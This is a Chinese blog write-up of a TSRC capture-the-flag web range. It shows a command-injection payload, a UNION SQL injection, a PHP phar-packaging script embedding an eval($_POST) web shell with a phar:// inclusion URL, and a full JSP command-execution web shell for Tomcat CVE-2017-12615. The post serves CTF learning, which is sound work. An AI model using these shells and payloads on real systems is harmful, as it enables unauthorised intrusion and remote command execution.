TSRC靶场赛-writeup

于 2020-06-30 22:07:57 发布
阅读量249 收藏
点赞数 1
分类专栏: T-Star学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45628145/article/details/107051602
版权

签到

文件上传JS验证,抓包or禁用JS

命令执行基础

啥都没过滤

payload:127.0.0.1|cat ../key.php

你能爆破吗

根据hint,爆破得到用户名admin、密码admin
再根据hint的cookie注入,继续判断字段、爆库、爆表、爆字段,得到flag
中间需要base64编码

成绩查询

union注入,同上

payload:-1' union select 1,2,3,flag from fl4g#

文件包含GetShell

文件上传点只能上传txt,再根据hint文件包含phar,就知道又是很简单的一个题目了,上传一个有后门的phar文件,扩展名改成.txt,然后phar文件包含就好了,连接,得到flag

生成phar文件
<?php
    $p = new Phar("my.phar", 0, 'my.phar');
	$p->startBuffering();
	$p['shell.php'] = '<?php phpinfo(); eval($_POST[x]); ?>';
	$p->setStub("<?php
    	Phar::mapPhar('myphar.phar'); 
		__HALT_COMPILER();");
 	$p->stopBuffering();
?>

payload:http://dd5ae31d.yunyansec.com/lfi.php?file=phar://files/JSWOJf0mA0u3Aiyd.txt/shell

小猫咪踩灯泡

根据hint的tomcat远程代码执行(CVE-2017-12615),百度得到了exp,照葫芦画瓢

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c) {
StringBuilder line = new StringBuilder();
	try {
	Process pro = Runtime.getRuntime().exec(c);
	BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
	String temp = null;
	while ((temp = buf.readLine()) != null) {
	line.append(temp+"\\n");}buf.close();
	} catch (Exception e) {
	line.append(e.getMessage());
	}return line.toString();
}%>
<%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){
	out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{
	out.println(":-)");
}%>
秋风瑟瑟...
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【WEB安全】PHP靶场实战分析——DVWA
真哥的博客
12-20 3822
文章目录前言一、实战前的准备:1.dvwa靶场安装2.代码审计工具介绍2.1.seay代码审计工具的介绍2.2.rips 审计工具介绍二、DVWA通关讲解1. brute force 暴力破解low:Medium:High:impossible:2. Command Injection(命令行注入)low:Medium:High:3. CSRF(跨站请求伪造)low:Medium:High:4. File Inclusion(文件包含)low:Medium:High:impossible:5. File U
Python-tsrc管理几个git仓库GitLab自动化
08-10
在“TankerHQ-tsrc-a35df82”这个压缩包中,很可能包含了tsrc项目的源代码,版本号为a35df82。如果你希望深入了解tsrc的内部实现或者对其进行二次开发,可以解压这个包,查阅源代码。通常,源代码会包含详细的文档和...
攻防世界 web进阶区 writeup
cherish的技术博
04-20 536
目录php_rce php_rce 参考链接 根据提示看应该是tp5的远程命令/代码执行漏洞 然后网上搜下payload。 emmm分析我是看不懂的。
CG CTF WEB 签到题
无限迭代中......
07-01 2041
http://chinalover.sinaapp.com/web1/ 题解: 审查元素 注释
SDUTsec-writeup:源码泄露+反序列化
等风来
10-12 841
SDUTsec-writeup:源码泄露+反序列化 1.源码泄露 题目链接:源码泄露 打开链接之后整个页面只有一句话: Flag_is_there 右键查看源代码啥也没有,试一下有没有备份文件,访问: http://139.199.31.116:9003/index.php.bak 显示404,不行那换下一个: http://139.199.31.116:9003/index.php.swp 这...
ctf
handuoduo123的博客
11-02 743
ctf 啾咪 打开是一可爱的小猫咪 图片后缀为png,推测与LSB相关,用Stegsolve打开,按左右键调三原色。 ![一般情况下,将三原色都调成0,BGR排序往上拉,可以看到一段码] 将得到的码,在base64下解码 ...
Python库 | tsrc-0.3.2-py3-none-any.whl
05-11
资源分类:Python库 所属语言:Python 资源全名:tsrc-0.3.2-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | tsrc-0.9.0.tar.gz
04-18
资源分类:Python库 所属语言:Python 资源全名:tsrc-0.9.0.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
TSRC挑战:WAF之SQL注入防御思路分享.pdf
09-18
TSRC挑战:WAF之SQL注入防御思路分享 安全测试 网络与基础架构安全 解决方案 企业安全 网络安全
TSRC挑战:WAF之SQL注入绕过挑战实录.pdf
09-18
TSRC挑战:WAF之SQL注入绕过挑战实录 红蓝对抗 安全架构 大数据 金融安全 漏洞挖掘
phar反序列化小结
Lethe's Blog
11-13 3028
0x00 phar反序列化 phar反序列化即在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直接进行反序列化操作。 关于其他反序列化的总结,可以看我的这篇文章 0x01 原理 首先了解一下phar文件的结构,一个phar文件由四部分构成: a stub:可以理解为一个标志,格式为xxx<...
CTFweb篇——签到题
热门推荐
suiyideAli的博客
09-21 1万+
0x00 前言 一个简单的CTF签到题。 0x01.打开靶场 0x02 打开靶场地址发现信息,通过题目提示信息使用burpsuit抓包 Send to Repeater 然后查看 Repeater 点击GO 在Response中 Headers 找到Flag ok完成。 ...
一个phar://的漏洞
Xi4or0uji
10-17 5791
前段时间打了个护网杯,题目质量是真的高,肉鸡又菜了一整场,遇到了一个不太会的东西,复现了一波,记录下好吧。 这个鬼东西就是phar://的序列化的漏洞 介绍一下 phar://跟php://filter 、data://那些一样,都是流包装,可以将一组php文件进行打包,可以创建默认执行的stub stub 就是一个标志,格式xxx&lt;?php xxxxx; __HALT_COMPIL...
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
07-17
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
torchaudio-0.13.1+cpu-cp39-cp39-win_amd64.whl
最新发布
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
出入库存盘点表-图表分析-分类查询-Excel模板
07-17
【作品名称】:出入库存盘点表-图表分析-分类查询-Excel模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
torchaudio-0.12.1+cpu-cp37-cp37m-win_amd64.whl
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
中南大学机械设计课程设计说明书.doc
07-17
说明书
腾讯TSRC漏洞处理与评分标准3.0详解
腾讯安全应急响应中心(TSRC)的漏洞处理和评分标准(版本3.0,发布于2020年5月21日)是针对腾讯威胁情报反馈平台所制定的一套详细指导规则。该标准旨在确保漏洞报告的质量、及时性和有效性,以便于对发现的漏洞进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值